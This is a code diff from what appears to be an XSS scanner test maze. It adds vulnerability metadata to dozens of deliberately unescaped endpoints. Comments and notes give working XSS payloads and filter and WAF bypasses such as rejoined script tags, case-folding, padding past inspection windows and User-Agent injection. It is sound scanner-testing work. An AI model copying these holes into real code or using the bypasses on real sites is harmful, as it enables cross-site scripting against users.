+  vuln: "reflected-html", delivery: ["query"], note: "both parameters are interpolated into the same start tag — attr is a bare attribute slot and tag sets the element name, and either can close the tag with >")
 maze_get "/realworld/level4/" do |env|
   tag = env.params.query.fetch("tag", "div")
   attr = env.params.query.fetch("attr", "class=test")
@@ -38,7 +42,8 @@ maze_get "/realworld/level4/" do |env|
 end
 
 # Level 5: Parameter key reflection
-Xssmaze.push("realworld-level5", "/realworld/level5/?search=a", "parameter key reflection")
+Xssmaze.push("realworld-level5", "/realworld/level5/?search=a", "parameter key reflection", "GET", ["search"],
+  vuln: "reflected-html", delivery: ["query"], note: "the reflection is the parameter *name*, not its value: send ?<svg onload=alert(1)>=1")
 maze_get "/realworld/level5/" do |env|
   keys = env.params.query.to_h.keys.join(", ")
 
@@ -46,7 +51,8 @@ maze_get "/realworld/level5/" do |env|
 end
 
 # Level 6: Wrong content-type (text/plain with HTML)
-Xssmaze.push("realworld-level6", "/realworld/level6/?query=a", "content-type sniffing (text/plain)")
+Xssmaze.push("realworld-level6", "/realworld/level6/?query=a", "content-type sniffing (text/plain)",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "the markup is reflected raw, but the response is served as text/plain, which no modern browser sniffs into HTML, so it never parses; reporting no XSS here is the correct result")
 maze_get "/realworld/level6/" do |env|
   query = env.params.query["query"]
   env.response.content_type = "text/plain"
@@ -55,7 +61,8 @@ maze_get "/realworld/level6/" do |env|
 end
 
 # Level 7: JS variable with newline injection (backslash-quote bypass)
-Xssmaze.push("realworld-level7", "/realworld/level7/?query=a", "JS newline injection (flawed escaping)")
+Xssmaze.push("realworld-level7", "/realworld/level7/?query=a", "JS newline injection (flawed escaping)",
+  vuln: "reflected-js", delivery: ["query"], note: "single quotes are backslash-escaped but backslashes are not, so \\';alert(1)// frees the quote")
 maze_get "/realworld/level7/" do |env|
   query = env.params.query["query"]
   # Flawed escaping: escapes single quotes but not backslashes
@@ -65,7 +72,8 @@ maze_get "/realworld/level7/" do |env|
 end
 
 # Level 8: Referer header reflection
-Xssmaze.push("realworld-level8", "/realworld/level8/", "referer header reflection in body")
+Xssmaze.push("realworld-level8", "/realworld/level8/", "referer header reflection in body", "GET", ["Referer"],
+  vuln: "reflected-html", delivery: ["referer"])
 maze_get "/realworld/level8/" do |env|
   referer = env.request.headers.fetch("Referer", "none")
 

--- a/src/mazes/regex_filter_xss.cr
+++ b/src/mazes/regex_filter_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Regex strips <script[^>]*>.*?</script> (non-greedy) - use <img> tags instead
-Xssmaze.push("regexfilt-level1", "/regexfilt/level1/?query=a", "regex strips script tags (non-greedy), use img/svg instead")
+Xssmaze.push("regexfilt-level1", "/regexfilt/level1/?query=a", "regex strips script tags (non-greedy), use img/svg instead",
+  vuln: "reflected-html", delivery: ["query"], note: "the pattern only removes a complete <script>...</script> pair, so another tag survives")
 maze_get "/regexfilt/level1/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/<script[^>]*>.*?<\/script>/im, "")
@@ -8,7 +9,8 @@ maze_get "/regexfilt/level1/" do |env|
 end
 
 # Level 2: Regex strips on\w+\s*= (event handlers with optional space) - use <script> instead
-Xssmaze.push("regexfilt-level2", "/regexfilt/level2/?query=a", "regex strips event handlers (on*=), use script tags instead")
+Xssmaze.push("regexfilt-level2", "/regexfilt/level2/?query=a", "regex strips event handlers (on*=), use script tags instead",
+  vuln: "reflected-html", delivery: ["query"], note: "on...= handlers are stripped, so use a tag that needs none")
 maze_get "/regexfilt/level2/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/on\w+\s*=/i, "")
@@ -17,7 +19,8 @@ maze_get "/regexfilt/level2/" do |env|
 end
 
 # Level 3: Regex strips <(script|img|svg|iframe)[^>]*> - use other tags like details, body, input
-Xssmaze.push("regexfilt-level3", "/regexfilt/level3/?query=a", "regex strips script/img/svg/iframe tags, use other tags")
+Xssmaze.push("regexfilt-level3", "/regexfilt/level3/?query=a", "regex strips script/img/svg/iframe tags, use other tags",
+  vuln: "reflected-html", delivery: ["query"], note: "only script/img/svg/iframe openers are stripped; other tags survive")
 maze_get "/regexfilt/level3/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/<(script|img|svg|iframe)[^>]*>/i, "")
@@ -26,7 +29,8 @@ maze_get "/regexfilt/level3/" do |env|
 end
 
 # Level 4: Regex strips javascript: (case insensitive), reflected in href - break out of href
-Xssmaze.push("regexfilt-level4", "/regexfilt/level4/?query=a", "regex strips javascript: in href, break out of attribute")
+Xssmaze.push("regexfilt-level4", "/regexfilt/level4/?query=a", "regex strips javascript: in href, break out of attribute",
+  vuln: "reflected-attr", delivery: ["query"], note: "javascript: is stripped from the href, so break out of the double-quoted attribute instead")
 maze_get "/regexfilt/level4/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/javascript:/i, "")
@@ -35,7 +39,8 @@ maze_get "/regexfilt/level4/" do |env|
 end
 
 # Level 5: Regex strips known tags (script,img,svg,iframe,object,embed) - use video, details, etc.
-Xssmaze.push("regexfilt-level5", "/regexfilt/level5/?query=a", "whitelist-style tag stripping, use unlisted tags")
+Xssmaze.push("regexfilt-level5", "/regexfilt/level5/?query=a", "whitelist-style tag stripping, use unlisted tags",
+  vuln: "reflected-html", delivery: ["query"], note: "six tag names are stripped in both open and close form; unlisted tags survive")
 maze_get "/regexfilt/level5/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/<\/?(script|img|svg|iframe|object|embed)[^>]*>/i, "")
@@ -44,7 +49,8 @@ maze_get "/regexfilt/level5/" do |env|
 end
 
 # Level 6: Regex replaces alert with _alert_ - use confirm/prompt/other functions
-Xssmaze.push("regexfilt-level6", "/regexfilt/level6/?query=a", "regex replaces alert with _alert_, use confirm/prompt")
+Xssmaze.push("regexfilt-level6", "/regexfilt/level6/?query=a", "regex replaces alert with _alert_, use confirm/prompt",
+  vuln: "reflected-html", delivery: ["query"], note: "\"alert\" becomes \"_alert_\"; confirm/prompt are untouched")
 maze_get "/regexfilt/level6/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/alert/i, "_alert_")

--- a/src/mazes/sanitizer_edge_xss.cr
+++ b/src/mazes/sanitizer_edge_xss.cr
@@ -1,7 +1,8 @@
 require "html"
 
 # Level 1: Strips all tags but reflects in input value attribute — attribute breakout with "
-Xssmaze.push("sanitizer-edge-level1", "/sanitizer-edge/level1/?query=a", "strip tags, reflect in input value (attribute breakout)")
+Xssmaze.push("sanitizer-edge-level1", "/sanitizer-edge/level1/?query=a", "strip tags, reflect in input value (attribute breakout)",
+  vuln: "reflected-attr", delivery: ["query"], note: "tags are stripped but quotes are not escaped, so break out of the input value attribute")
 maze_get "/sanitizer-edge/level1/" do |env|
   query = env.params.query["query"]
   # Strip all HTML tags but don't escape quotes
@@ -11,7 +12,8 @@ maze_get "/sanitizer-edge/level1/" do |env|
 end
 
 # Level 2: HTML-encodes <>"' but reflects inside script without quotes — raw JS injection
-Xssmaze.push("sanitizer-edge-level2", "/sanitizer-edge/level2/?query=a", "HTML-encode special chars, reflect in unquoted script var")
+Xssmaze.push("sanitizer-edge-level2", "/sanitizer-edge/level2/?query=a", "HTML-encode special chars, reflect in unquoted script var",
+  vuln: "reflected-js", delivery: ["query"], note: "<>\"' are all entity-encoded, but the value lands as a bare JS expression with no quotes to break out of, so plain JavaScript such as alert(1) runs as-is")
 maze_get "/sanitizer-edge/level2/" do |env|
   query = env.params.query["query"]
   # Encode HTML special chars: < > " '
@@ -21,7 +23,8 @@ maze_get "/sanitizer-edge/level2/" do |env|
 end
 
 # Level 3: Strips <script> recursively but allows other tags — use img/svg onerror
-Xssmaze.push("sanitizer-edge-level3", "/sanitizer-edge/level3/?query=a", "recursive script strip, other tags allowed")
+Xssmaze.push("sanitizer-edge-level3", "/sanitizer-edge/level3/?query=a", "recursive script strip, other tags allowed",
+  vuln: "reflected-html", delivery: ["query"], note: "script tags are stripped recursively, so nesting does not help; use another tag")
 maze_get "/sanitizer-edge/level3/" do |env|
   query = env.params.query["query"]
   # Recursively strip <script> and </script> tags
@@ -36,7 +39,8 @@ maze_get "/sanitizer-edge/level3/" do |env|
 end
 
 # Level 4: Tag whitelist (b/i/u/em/strong) — but attributes on whitelisted tags not checked
-Xssmaze.push("sanitizer-edge-level4", "/sanitizer-edge/level4/?query=a", "tag whitelist but event attributes allowed on whitelisted tags")
+Xssmaze.push("sanitizer-edge-level4", "/sanitizer-edge/level4/?query=a", "tag whitelist but event attributes allowed on whitelisted tags",
+  vuln: "reflected-html", delivery: ["query"], note: "the whitelist keeps b/i/u/em/strong but does not strip their attributes, so an event handler on a whitelisted tag survives")
 maze_get "/sanitizer-edge/level4/" do |env|
   query = env.params.query["query"]
   # Whitelist: only allow b, i, u, em, strong tags (case-sensitive check)
@@ -49,7 +53,8 @@ maze_get "/sanitizer-edge/level4/" do |env|
 end
 
 # Level 5: Strips tags/dangerous attrs but allows style — attribute breakout from style
-Xssmaze.push("sanitizer-edge-level5", "/sanitizer-edge/level5/?query=a", "style attribute allowed, breakout from style value")
+Xssmaze.push("sanitizer-edge-level5", "/sanitizer-edge/level5/?query=a", "style attribute allowed, breakout from style value",
+  vuln: "reflected-attr", delivery: ["query"], note: "tags are stripped, so break out of the style attribute with a quote instead")
 maze_get "/sanitizer-edge/level5/" do |env|
   query = env.params.query["query"]
   # Strip all HTML tags from query
@@ -59,7 +64,8 @@ maze_get "/sanitizer-edge/level5/" do |env|
 end
 
 # Level 6: Strips javascript:/vbscript:/data: from href — attribute breakout instead
-Xssmaze.push("sanitizer-edge-level6", "/sanitizer-edge/level6/?query=a", "protocol strip in href, attribute breakout")
+Xssmaze.push("sanitizer-edge-level6", "/sanitizer-edge/level6/?query=a", "protocol strip in href, attribute breakout",
+  vuln: "reflected-attr", delivery: ["query"], note: "javascript:/vbscript:/data: are stripped from the href, so break out of the attribute instead")
 maze_get "/sanitizer-edge/level6/" do |env|
   query = env.params.query["query"]
   # Strip dangerous protocols

--- a/src/mazes/special_char_xss.cr
+++ b/src/mazes/special_char_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Server strips backslashes, reflects in body
-Xssmaze.push("specialchar-level1", "/specialchar/level1/?query=a", "strips backslashes then reflects in body")
+Xssmaze.push("specialchar-level1", "/specialchar/level1/?query=a", "strips backslashes then reflects in body",
+  vuln: "reflected-html", delivery: ["query"], note: "backslashes are stripped; nothing else is")
 maze_get "/specialchar/level1/" do |env|
   query = env.params.query["query"].gsub("\\", "")
 
@@ -10,7 +11,8 @@ maze_get "/specialchar/level1/" do |env|
 end
 
 # Level 2: Server strips semicolons, reflects in body
-Xssmaze.push("specialchar-level2", "/specialchar/level2/?query=a", "strips semicolons then reflects in body")
+Xssmaze.push("specialchar-level2", "/specialchar/level2/?query=a", "strips semicolons then reflects in body",
+  vuln: "reflected-html", delivery: ["query"], note: "semicolons are stripped, which breaks HTML entities but not a plain tag payload")
 maze_get "/specialchar/level2/" do |env|
   query = env.params.query["query"].gsub(";", "")
 
@@ -21,7 +23,8 @@ maze_get "/specialchar/level2/" do |env|
 end
 
 # Level 3: Server strips colons, reflects in body
-Xssmaze.push("specialchar-level3", "/specialchar/level3/?query=a", "strips colons then reflects in body")
+Xssmaze.push("specialchar-level3", "/specialchar/level3/?query=a", "strips colons then reflects in body",
+  vuln: "reflected-html", delivery: ["query"], note: "colons are stripped, which kills javascript: but not a tag payload")
 maze_get "/specialchar/level3/" do |env|
   query = env.params.query["query"].gsub(":", "")
 
@@ -32,7 +35,8 @@ maze_get "/specialchar/level3/" do |env|
 end
 
 # Level 4: Server URL-decodes input then reflects raw
-Xssmaze.push("specialchar-level4", "/specialchar/level4/?query=a", "URL-decodes input then reflects raw")
+Xssmaze.push("specialchar-level4", "/specialchar/level4/?query=a", "URL-decodes input then reflects raw",
+  vuln: "reflected-html", delivery: ["query"], note: "the value is URL-decoded a second time server-side, so %3Cscript%3E also reaches the sink")
 maze_get "/specialchar/level4/" do |env|
   raw_query = env.params.query["query"]
   decoded = URI.decode(raw_query)
@@ -44,7 +48,8 @@ maze_get "/specialchar/level4/" do |env|
 end
 
 # Level 5: Server double-URL-decodes input then reflects raw
-Xssmaze.push("specialchar-level5", "/specialchar/level5/?query=a", "double URL-decodes input then reflects raw")
+Xssmaze.push("specialchar-level5", "/specialchar/level5/?query=a", "double URL-decodes input then reflects raw",
+  vuln: "reflected-html", delivery: ["query"], note: "the value is URL-decoded twice more server-side, so a double-encoded payload also reaches the sink")
 maze_get "/specialchar/level5/" do |env|
   raw_query = env.params.query["query"]
   decoded = URI.decode(URI.decode(raw_query))
@@ -56,7 +61,8 @@ maze_get "/specialchar/level5/" do |env|
 end
 
 # Level 6: Server strips null bytes only, reflects raw
-Xssmaze.push("specialchar-level6", "/specialchar/level6/?query=a", "strips null bytes then reflects raw")
+Xssmaze.push("specialchar-level6", "/specialchar/level6/?query=a", "strips null bytes then reflects raw",
+  vuln: "reflected-html", delivery: ["query"], note: "only NUL bytes are stripped")
 maze_get "/specialchar/level6/" do |env|
   query = env.params.query["query"].gsub("\u{0}", "")
 

--- a/src/mazes/srcset_xss.cr
+++ b/src/mazes/srcset_xss.cr
@@ -3,25 +3,29 @@
 # quote and adds onerror=). The category exists so scanners can verify they
 # spot reflection inside these specific image-loading attributes.
 
-Xssmaze.push("srcset-level1", "/srcset/level1/?query=a", "attribute-context injection in <img srcset> (multi-candidate)")
+Xssmaze.push("srcset-level1", "/srcset/level1/?query=a", "attribute-context injection in <img srcset> (multi-candidate)",
+  vuln: "reflected-attr", delivery: ["query"], note: "a srcset URL never executes on its own — the bug is the unescaped single-quoted attribute around it")
 maze_get "/srcset/level1/" do |env|
   query = env.params.query["query"]
   "<img srcset='#{query}'>"
 end
 
-Xssmaze.push("srcset-level2", "/srcset/level2/?query=a", "attribute-context injection in <source srcset> inside <picture>")
+Xssmaze.push("srcset-level2", "/srcset/level2/?query=a", "attribute-context injection in <source srcset> inside <picture>",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/srcset/level2/" do |env|
   query = env.params.query["query"]
   "<picture><source srcset='#{query}'><img src='/fallback.png'></picture>"
 end
 
-Xssmaze.push("srcset-level3", "/srcset/level3/?query=a", "attribute-context injection with comma stripped (descriptor bypass)")
+Xssmaze.push("srcset-level3", "/srcset/level3/?query=a", "attribute-context injection with comma stripped (descriptor bypass)",
+  vuln: "reflected-attr", delivery: ["query"], note: "commas are stripped and a \" 1x\" descriptor is appended after the reflection")
 maze_get "/srcset/level3/" do |env|
   query = env.params.query["query"].gsub(",", "")
   "<img srcset='#{query} 1x'>"
 end
 
-Xssmaze.push("srcset-level4", "/srcset/level4/?query=a", "attribute-context injection on <link rel=preload imagesrcset>")
+Xssmaze.push("srcset-level4", "/srcset/level4/?query=a", "attribute-context injection on <link rel=preload imagesrcset>",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/srcset/level4/" do |env|
   query = env.params.query["query"]
   "<link rel='preload' as='image' imagesrcset='#{query}'>"

--- a/src/mazes/table_context_xss.cr
+++ b/src/mazes/table_context_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Reflected in <td> inside a table
-Xssmaze.push("tablecontext-level1", "/tablecontext/level1/?query=a", "reflection in td element")
+Xssmaze.push("tablecontext-level1", "/tablecontext/level1/?query=a", "reflection in td element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level1/" do |env|
   query = env.params.query["query"]
 
@@ -10,7 +11,8 @@ maze_get "/tablecontext/level1/" do |env|
 end
 
 # Level 2: Reflected in <th> inside a table
-Xssmaze.push("tablecontext-level2", "/tablecontext/level2/?query=a", "reflection in th element")
+Xssmaze.push("tablecontext-level2", "/tablecontext/level2/?query=a", "reflection in th element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level2/" do |env|
   query = env.params.query["query"]
 
@@ -21,7 +23,8 @@ maze_get "/tablecontext/level2/" do |env|
 end
 
 # Level 3: Reflected in <caption> inside a table
-Xssmaze.push("tablecontext-level3", "/tablecontext/level3/?query=a", "reflection in caption element")
+Xssmaze.push("tablecontext-level3", "/tablecontext/level3/?query=a", "reflection in caption element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level3/" do |env|
   query = env.params.query["query"]
 
@@ -32,7 +35,8 @@ maze_get "/tablecontext/level3/" do |env|
 end
 
 # Level 4: Reflected in <li> inside a <ul>
-Xssmaze.push("tablecontext-level4", "/tablecontext/level4/?query=a", "reflection in li element")
+Xssmaze.push("tablecontext-level4", "/tablecontext/level4/?query=a", "reflection in li element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level4/" do |env|
   query = env.params.query["query"]
 
@@ -43,7 +47,8 @@ maze_get "/tablecontext/level4/" do |env|
 end
 
 # Level 5: Reflected in <dd> inside a <dl>
-Xssmaze.push("tablecontext-level5", "/tablecontext/level5/?query=a", "reflection in dd element")
+Xssmaze.push("tablecontext-level5", "/tablecontext/level5/?query=a", "reflection in dd element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level5/" do |env|
   query = env.params.query["query"]
 
@@ -54,7 +59,8 @@ maze_get "/tablecontext/level5/" do |env|
 end
 
 # Level 6: Reflected in <figcaption> inside a <figure>
-Xssmaze.push("tablecontext-level6", "/tablecontext/level6/?query=a", "reflection in figcaption element")
+Xssmaze.push("tablecontext-level6", "/tablecontext/level6/?query=a", "reflection in figcaption element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/tablecontext/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/timing_xss.cr
+++ b/src/mazes/timing_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: Reflection in <script> variable assignment with double quotes
 # Exploit: query=";alert(1)// or query=";</script><script>alert(1)</script>
-Xssmaze.push("timing-level1", "/timing/level1/?query=a", "reflection in JS double-quoted string assignment")
+Xssmaze.push("timing-level1", "/timing/level1/?query=a", "reflection in JS double-quoted string assignment",
+  vuln: "reflected-js", delivery: ["query"])
 maze_get "/timing/level1/" do |env|
   query = env.params.query["query"]
 
@@ -12,7 +13,8 @@ end
 
 # Level 2: Reflection in JS object key
 # Exploit: query=x}; alert(1);// or query=x: "value"}; alert(1); var y = {z
-Xssmaze.push("timing-level2", "/timing/level2/?query=a", "reflection in JS object key")
+Xssmaze.push("timing-level2", "/timing/level2/?query=a", "reflection in JS object key",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands where a JS object key goes, so it is parsed as an expression rather than a string")
 maze_get "/timing/level2/" do |env|
   query = env.params.query["query"]
 
@@ -24,7 +26,8 @@ end
 
 # Level 3: Reflection after // JS single-line comment (newline breaks out)
 # Exploit: query=%0aalert(1)// (newline escapes the comment)
-Xssmaze.push("timing-level3", "/timing/level3/?query=a", "reflection after JS line comment (newline breakout)")
+Xssmaze.push("timing-level3", "/timing/level3/?query=a", "reflection after JS line comment (newline breakout)",
+  vuln: "reflected-js", delivery: ["query"], note: "the value follows a // line comment, so a newline (%0a) is needed to reach executable code")
 maze_get "/timing/level3/" do |env|
   query = env.params.query["query"]
 
@@ -36,7 +39,8 @@ end
 
 # Level 4: Reflection inside JS regex literal
 # Exploit: query=/;alert(1)// (close regex then inject)
-Xssmaze.push("timing-level4", "/timing/level4/?query=a", "reflection inside JS regex literal")
+Xssmaze.push("timing-level4", "/timing/level4/?query=a", "reflection inside JS regex literal",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands inside a regex literal; close it with / first")
 maze_get "/timing/level4/" do |env|
   query = env.params.query["query"]
 
@@ -48,7 +52,8 @@ end
 
 # Level 5: Reflection in <script> with single-quote string
 # Exploit: query=';alert(1)// or query=';</script><script>alert(1)</script>
-Xssmaze.push("timing-level5", "/timing/level5/?query=a", "reflection in JS single-quoted string")
+Xssmaze.push("timing-level5", "/timing/level5/?query=a", "reflection in JS single-quoted string",
+  vuln: "reflected-js", delivery: ["query"])
 maze_get "/timing/level5/" do |env|
   query = env.params.query["query"]
 
@@ -60,7 +65,8 @@ end
 
 # Level 6: Reflection in JS template literal (backtick string)
 # Exploit: query=${alert(1)} or query=`;</script><script>alert(1)</script>
-Xssmaze.push("timing-level6", "/timing/level6/?query=a", "reflection in JS template literal (backtick)")
+Xssmaze.push("timing-level6", "/timing/level6/?query=a", "reflection in JS template literal (backtick)",
+  vuln: "reflected-js", delivery: ["query"], note: "template literal, so ${...} evaluates without closing the string at all")
 maze_get "/timing/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/waf_bypass_v2_xss.cr
+++ b/src/mazes/waf_bypass_v2_xss.cr
@@ -1,7 +1,8 @@
 # Level 1: Strips "script" keyword (case-insensitive, single pass)
 # Bypass: <scr<script>ipt>alert(1)</scr</script>ipt> — after single-pass removal of "script",
 # the outer fragments rejoin into <script>alert(1)</script>
-Xssmaze.push("wafv2-level1", "/wafv2/level1/?query=a", "single-pass case-insensitive 'script' strip (rejoin bypass)")
+Xssmaze.push("wafv2-level1", "/wafv2/level1/?query=a", "single-pass case-insensitive 'script' strip (rejoin bypass)",
+  vuln: "reflected-html", delivery: ["query"], note: "\"script\" is removed case-insensitively in a single pass, so <scr<script>ipt> rejoins")
 maze_get "/wafv2/level1/" do |env|
   query = Filters.strip_keyword_ci(env.params.query["query"], "script")
 
@@ -11,7 +12,8 @@ end
 # Level 2: Strips event handlers matching on\w+= pattern
 # Bypass: use <script>alert(1)</script> which has no event handler,
 # or <svg><set attributeName=onmouseover to=alert(1)> (no = after onmouseover in source)
-Xssmaze.push("wafv2-level2", "/wafv2/level2/?query=a", "event handler on\\w+= pattern strip (script tag bypass)")
+Xssmaze.push("wafv2-level2", "/wafv2/level2/?query=a", "event handler on\\w+= pattern strip (script tag bypass)",
+  vuln: "reflected-html", delivery: ["query"], note: "on...= handlers are stripped, and a plain <script> tag has none")
 maze_get "/wafv2/level2/" do |env|
   query = Filters.strip_event_handlers(env.params.query["query"])
 
@@ -24,7 +26,8 @@ end
 # Simplest for scanner: <img src=x onerror=eval(atob('YWxlcnQoMSk='))>
 # Or: <img src=x onerror=window['ale'+'rt'](1)>
 # Or: <script>eval('al'+'ert(1)')</script>
-Xssmaze.push("wafv2-level3", "/wafv2/level3/?query=a", "alert/confirm/prompt function name strip")
+Xssmaze.push("wafv2-level3", "/wafv2/level3/?query=a", "alert/confirm/prompt function name strip",
+  vuln: "reflected-html", delivery: ["query"], note: "alert/confirm/prompt are stripped by name, so build the call another way")
 maze_get "/wafv2/level3/" do |env|
   query = Filters.strip_keyword_ci(env.params.query["query"], "alert")
   query = Filters.strip_keyword_ci(query, "confirm")
@@ -36,7 +39,8 @@ end
 # Level 4: Blocks if input length > 50 chars, reflects raw otherwise
 # Bypass: use short payloads like <svg/onload=alert(1)> (27 chars)
 # or <img src=x onerror=alert(1)> (30 chars)
-Xssmaze.push("wafv2-level4", "/wafv2/level4/?query=a", "length limit: blocked if > 50 chars")
+Xssmaze.push("wafv2-level4", "/wafv2/level4/?query=a", "length limit: blocked if > 50 chars",
+  vuln: "reflected-html", delivery: ["query"], note: "values over 50 characters are blocked outright")
 maze_get "/wafv2/level4/" do |env|
   query = env.params.query["query"]
 
@@ -50,7 +54,8 @@ end
 # Level 5: Strips < followed by any alpha char (blocks <script, <img, <svg, etc.)
 # Reflection is inside a value="" attribute, so no < needed — break out of attribute
 # Bypass: " onmouseover=alert(1) x=" or " autofocus onfocus=alert(1) x="
-Xssmaze.push("wafv2-level5", "/wafv2/level5/?query=a", "strip <[a-zA-Z] pattern, reflected in value attribute")
+Xssmaze.push("wafv2-level5", "/wafv2/level5/?query=a", "strip <[a-zA-Z] pattern, reflected in value attribute",
+  vuln: "reflected-attr", delivery: ["query"], note: "< followed by a letter is stripped, so no tag can be opened; the reflection is in an input value, so break out of the attribute")
 maze_get "/wafv2/level5/" do |env|
   query = env.params.query["query"].gsub(/<[a-zA-Z]/, "")
 
@@ -60,7 +65,8 @@ end
 # Level 6: Multiple filters combined — strips <script> and </script> tags,
 # encodes " to &quot;, but allows ' (single quotes) and does NOT encode < > for non-script tags
 # Bypass: <img src=x onerror='alert(1)'> works because img tags pass through and ' is unescaped
-Xssmaze.push("wafv2-level6", "/wafv2/level6/?query=a", "multi-filter: script tag strip + quote encode, but < > and ' allowed")
+Xssmaze.push("wafv2-level6", "/wafv2/level6/?query=a", "multi-filter: script tag strip + quote encode, but < > and ' allowed",
+  vuln: "reflected-html", delivery: ["query"], note: "script tags are stripped and double quotes entity-encoded, but other tags and single quotes survive")
 maze_get "/wafv2/level6/" do |env|
   query = env.params.query["query"]
   # Strip <script> and </script> tags (case-insensitive)

--- a/src/mazes/waf_facade_xss.cr
+++ b/src/mazes/waf_facade_xss.cr
@@ -104,7 +104,8 @@ end
 # sink. The normal page escapes its reflection, so the only way through is the
 # block page. Real-world class: WAF/CDN block page reflected XSS.
 # Bypass: any blocked payload, e.g. <script>alert(1)</script> or <svg onload=alert(1)>
-Xssmaze.push("waf-facade-level1", "/waf-facade/level1/?query=a", "Cloudflare-style block page reflects the blocked payload raw (block-page XSS)")
+Xssmaze.push("waf-facade-level1", "/waf-facade/level1/?query=a", "Cloudflare-style block page reflects the blocked payload raw (block-page XSS)",
+  vuln: "reflected-html", delivery: ["query"], note: "the normal page HTML-escapes its reflection; the raw reflection is on the branded 403 block page, so the payload has to trip the WAF pattern to reach the sink at all")
 maze_get "/waf-facade/level1/" do |env|
   query = env.params.query.fetch("query", "")
 
@@ -129,7 +130,8 @@ end
 # real payload past the inspection window.
 # Bypass: 100+ chars of padding, then the vector —
 #   ?query=aaaa…(100)…aaaa<svg onload=alert(1)>
-Xssmaze.push("waf-facade-level2", "/waf-facade/level2/?query=a", "AWS WAF-style inspection-size cap: only the first 100 bytes are scanned")
+Xssmaze.push("waf-facade-level2", "/waf-facade/level2/?query=a", "AWS WAF-style inspection-size cap: only the first 100 bytes are scanned",
+  vuln: "reflected-html", delivery: ["query"], note: "only the first 100 bytes are inspected, so padding the value past that window gets the full string reflected raw")
 maze_get "/waf-facade/level2/" do |env|
   query = env.params.query.fetch("query", "")
   window = query[0, 100]
@@ -151,7 +153,8 @@ end
 # built from un-scored primitives slips under.
 # Bypass: avoid the scored keywords, e.g.
 #   <input autofocus onfocus=confirm(1)>   (input/onfocus/confirm are un-scored)
-Xssmaze.push("waf-facade-level3", "/waf-facade/level3/?query=a", "ModSecurity CRS-style anomaly scoring (un-scored primitives slip under the threshold)")
+Xssmaze.push("waf-facade-level3", "/waf-facade/level3/?query=a", "ModSecurity CRS-style anomaly scoring (un-scored primitives slip under the threshold)",
+  vuln: "reflected-html", delivery: ["query"], note: "anomaly scoring blocks at 5 points, so a payload built from un-scored primitives such as <input autofocus onfocus=confirm(1)> stays under the threshold")
 maze_get "/waf-facade/level3/" do |env|
   query = env.params.query.fetch("query", "")
   score = WafFacade.crs_score(query)
@@ -173,7 +176,8 @@ end
 # it. Classic scope gap: the WAF guards query/body, a header sink is missed.
 # Bypass: keep ?query benign, put the payload in the User-Agent header —
 #   User-Agent: <img src=x onerror=alert(1)>
-Xssmaze.push("waf-facade-level4", "/waf-facade/level4/?query=a", "Akamai-style WAF guards the query but reflects the User-Agent header raw", "GET", ["query", "User-Agent"])
+Xssmaze.push("waf-facade-level4", "/waf-facade/level4/?query=a", "Akamai-style WAF guards the query but reflects the User-Agent header raw", "GET", ["query", "User-Agent"],
+  vuln: "reflected-html", delivery: ["header"], note: "the query parameter is escaped and guarded, but the User-Agent header is reflected raw and never inspected, so the payload goes in the header while query stays benign")
 maze_get "/waf-facade/level4/" do |env|
   query = env.params.query.fetch("query", "")
   ua = env.request.headers["User-Agent"]? || "unknown"
@@ -196,7 +200,8 @@ end
 # is a case-SENSITIVE literal denylist, so a case-folded vector walks straight
 # past it before being reflected raw.
 # Bypass: case-fold the tag/handler, e.g.  <SvG OnLoad=alert(1)>  or  <ScRiPt>alert(1)</ScRiPt>
-Xssmaze.push("waf-facade-level5", "/waf-facade/level5/?query=a", "F5 ASM-style case-sensitive literal denylist (case-fold bypass)")
+Xssmaze.push("waf-facade-level5", "/waf-facade/level5/?query=a", "F5 ASM-style case-sensitive literal denylist (case-fold bypass)",
+  vuln: "reflected-html", delivery: ["query"], note: "the denylist is case-sensitive, so a case-folded vector such as <SvG OnLoad=...> walks straight past it")
 maze_get "/waf-facade/level5/" do |env|
   query = env.params.query.fetch("query", "")
 
@@ -221,7 +226,8 @@ end
 # branded block page — but the reflection actually lands inside a single-quoted JS
 # string, where no angle brackets are needed at all.
 # Bypass: break the JS string instead of injecting a tag —  ';alert(1)//
-Xssmaze.push("waf-facade-level6", "/waf-facade/level6/?query=a", "Incapsula-style tag-focused WAF, but the reflection is in a JS string context")
+Xssmaze.push("waf-facade-level6", "/waf-facade/level6/?query=a", "Incapsula-style tag-focused WAF, but the reflection is in a JS string context",
+  vuln: "reflected-js", delivery: ["query"], note: "any opening tag trips the block page, but the reflection is in a single-quoted JS string where no angle brackets are needed")
 maze_get "/waf-facade/level6/" do |env|
   query = env.params.query.fetch("query", "")
 
@@ -246,7 +252,8 @@ end
 # into the DOM before any script runs. The server response is the real sink.
 # Bypass: just send the payload — it is already in the initial HTML —
 #   ?query=<img src=x onerror=alert(1)>
-Xssmaze.push("waf-facade-level7", "/waf-facade/level7/?query=a", "Cosmetic client-side WAF: the server reflects raw before the JS 'sanitizer' runs")
+Xssmaze.push("waf-facade-level7", "/waf-facade/level7/?query=a", "Cosmetic client-side WAF: the server reflects raw before the JS 'sanitizer' runs",
+  vuln: "reflected-html", delivery: ["query"], note: "the client-side sanitizer only feeds a second element; the server already reflected the raw value into #preview before any script ran")
 maze_get "/waf-facade/level7/" do |env|
